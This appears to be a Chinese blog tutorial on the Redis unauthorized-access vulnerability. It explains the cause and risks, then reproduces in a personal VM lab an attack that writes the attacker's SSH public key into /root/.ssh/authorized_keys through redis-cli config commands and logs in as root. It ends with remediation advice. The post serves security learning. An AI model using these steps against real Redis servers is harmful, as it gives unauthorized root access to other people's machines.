文章目录
漏洞描述(介绍、成因)
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
漏洞危害
1、攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
2、攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;
3、最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
适用场景
目标机器存在redis未授权漏洞,或者redis弱口令漏洞。
实验环境
个人虚拟机
- 攻击机:
- Kali 192.168.10.128
- 靶机:
- Centos7(开启 redis 服务器) 192.168.10.135
漏洞复现过程(有条件的自行搭建环境)
redis未授权利用公钥登录ssh
1、在kali生成一对ssh密钥
ssh-keygen -t rsa
2、查看生成的公钥key
cd /root/.ssh/
cat ./id_rsa.pub
3、导出key
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
4、把公钥key写入redis的键值key中
cat key.txt|redis-cli -h 192.168.10.135 -x set key
5、设置保存的文件路径
config set dir /root/.ssh
6、设置保存的文件名authorized_keys
redis-cli -h 192.168.10.135 config set dbfilename authorized_keys
7、通过ssh公钥认证登录目标机器
ssh -i id_rsa root@192.168.10.135
修复建议
1、禁止外部访问Redis服务端口;
2、禁止使用root权限启动redis服务;
3、配置安全组,限制可连接Redis服务器的IP。
扩展知识(链接、文章)
其他利用手法:Redis未授权最全利用方式
注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!
5442
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
